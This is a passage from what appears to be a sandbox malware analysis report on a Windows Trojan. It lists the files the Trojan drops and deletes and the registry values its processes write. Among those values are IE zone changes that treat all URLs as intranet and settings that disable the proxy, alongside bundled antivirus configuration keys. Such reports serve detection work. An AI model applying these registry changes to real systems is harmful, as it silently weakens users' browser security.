%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\img[1].png (135828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\img.rar (82437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_kprd7_93.xml (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FFS5V15X\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\go.png (196 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (3376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_5.tmp_0 (631 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check-box.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jieya_button.png (392 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\installedSoftInfo.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MA_16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_10.tmp (0 bytes)
C:\op_5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_C.tmp (0 bytes)
C:\_6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_15.tmp (0 bytes)
Registry activity
The process MM-liao8327.exe:1372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A D6 D8 05 93 AE 25 58 0C 0D 0C 0A 83 4B 32 A7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process popwndexe.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 87 A9 F2 4A DF B7 2F 6C 9A 4E 2D FD 89 D2 96"
The process install1403380.exe:1196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\rdisk_exec_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\bamon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\SmartScan]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\AutoTreatInfected]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\eshopmon\state]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\rising\RAV\cfg\BRScan\pro_path]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\UseAI]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\exploit_scan_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\selfdef\protect_registries]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\PackageSizeLimit]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"DisplayVersion" = "24.00.43.08"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\vpatchmon\func]
"(Default)" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\GlobalCache]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\homepageguard\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\DenferTime]
"(Default)" = "255"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising]
"Path" = "%Program Files%\Rising\RAV\nprising.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\PollingInterval]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg]
"ver" = "24"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\rising\lockie]
"url6" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcV/U="
"url1" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcUP4="
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\rising\lockie]
"url2" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcU/E="
[HKLM\SOFTWARE\rising\RAV\cfg\EnhancedSelfProtect\Enable]
"ver" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayVersion" = "23.00.01.03"
[HKLM\SOFTWARE\rising\lockie]
"url9" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcWPY="
"url8" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcWfc="
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\HTTP\Mode]
"(Default)" = "Post"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\scriptmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\state]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"Publisher" = "Beijing Rising Information Technology, Inc."
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\AutoTreatInfected]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\file_ext_filter]
"(Default)" = "VBS;VBE;JS;JSE;LSP;FAS;ASP;HTT;HTA;CSS;WSH;MHT;JSP;PHP;HTM;HTML;RB;LUA;PY;EXE;COM;SYS;VXD;DRV;DLL;BIN;OVL;386;FON;DOC;DOT;XLS;XLT;PPT;BAT;SCT;OCX;CPL;LNK;EML;NWS;PIF;SHS;MAI;SCR;ZIP;7Z;ARJ;BZ2;BZIP2;CAB;GZ;GZIP;HFS;ISO;LHA;LZH;LZMA;RAR;TAR;"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\InsufficientSpaceHandleMethod]
"ver" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"DisplayName" = "Rising Software Deployment System"
[HKLM\SOFTWARE\rising\rscommon]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\common"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\mailmon\verdict_vir_found]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\autorun_disable_state]
"(Default)" = "1"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising]
"Description" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\DisableLog]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\eshopmon\sites]
"(Default)" = "D8 6D 9D 5B 51 7F 00 00 2A 00 2E 00 74 00 61 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\Report]
"(Default)" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}]
"ProcID" = "{CF565346-22FD-6648-3030-303030303030}"
[HKLM\SOFTWARE\rising\RAV\cfg\SoftwareSafe\Default\ProtectConfig\ProtectType]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\bamon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Services\SysMon]
"Type" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\mailmon\verdict_vir_found]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\notify_user]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\SoftwareSafe\ProtectConfig\ProtectType]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\SmartScan]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ShowLogonIcon]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\instrmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\EnhancedSelfProtect\Enable]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\app_filters]
"(Default)" = "00 00 00 00"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising]
"vender" = "Rising"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\eshopmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\app_filters]
"(Default)" = "2D 00 2D 00 74 00 79 00 70 00 65 00 3D 00 00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\WorkMode\AutoEnterSilenceMode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\scan_timeout]
"(Default)" = "30000"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\NoTrayIcon]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"URLInfoAbout" = "http://help.ikaka.com/"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\eshopmon\sites]
"(Default)" = "D8 6D 9D 5B 51 7F 00 00 2A 00 2E 00 74 00 61 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\PackageSizeLimit]
"ver" = "3"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}]
"ProcKey" = "RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\AlertSound]
"ver" = "1"
[HKLM\System\CurrentControlSet\Services\SysMon]
"Group" = "Boot Bus Extender"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\PopupInterval]
"(Default)" = "600"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\vpatchmon\func]
"(Default)" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\file_ext_filter]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\bamon\verdict_vir_found]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\NavigateXml\bxfix]
"(Default)" = "http://rscloud.rising.net.cn/navigate_bwfix.xml"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\Default\UseCloudDefence]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\Default\SmartRelocate]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\homepageguard\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\whitemask]
"(Default)" = "25"
[HKLM\System\CurrentControlSet\Services\sysmon\Instances\sysmon]
"Altitude" = "370070"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\GlobalCache]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\zone]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\SmartScan]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\instrmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rs_processes]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\vpatchmon\func]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\FileNameFilter]
"(Default)" = ".exe|.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\REGO]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\DisableLog]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BackgroundScan\State]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\file_ext_filter]
"ver" = "1"
[HKCU\Software\MozillaPlugins\@rising.com.cn/nprising]
"Path" = "%Program Files%\Rising\RAV\nprising.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\mode]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ShowAgent]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\mode]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\HTTP\Count]
"(Default)" = "592"
[HKLM\SOFTWARE\rising\RAV\cfg\RsLog\Default\KeepDays]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\UninstallProtect]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\NoTrayIcon]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ScanResultCountPerPage]
"(Default)" = "268435455"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RSD"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\QQMgrInterval]
"(Default)" = "900"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"InstallLocation" = "%Program Files%\Rising\RSD"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV]
"InstallPath" = "%Program Files%\Rising\RAV"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\rdisk_exec_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\Baidu]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\writelog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\mailmon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\instrmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\PackageSizeLimit]
"ver" = "4"
[HKLM\SOFTWARE\rising\RAV]
"Type" = "17"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\whitemask]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\BRScan\reg_path]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV]
"Version" = "24.00.43.08"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\UseAI]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\level]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising\MimeType]
"(Default)" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ShowLogonIcon]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\eshopmon\sites]
"ver" = "16"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\NoBacore]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ShowScanAd]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RAV"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\MaxScanDeep]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsLog\KeepDays]
"(Default)" = "60"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\mode]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\MaxScanDeep]
"(Default)" = "2"
[HKLM\System\CurrentControlSet\Services\sysmon\Instances]
"DefaultInstance" = "sysmon"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\NavigateXml\conntest]
"(Default)" = "http://rscloud.rising.net.cn/cloud.html"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsLog\Default\KeepDays]
"(Default)" = "60"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\AutoTreatInfected]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\PackageSizeLimit]
"ver" = "4"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\Default\InsufficientSpaceHandleMethod]
"(Default)" = "0"
[HKLM\System\CurrentControlSet\Services\SysMon]
"DebugLevel" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\UseCloudEngine]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\notify_user]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\AutoTreatInfected]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\Enable]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\PreciseFormat]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
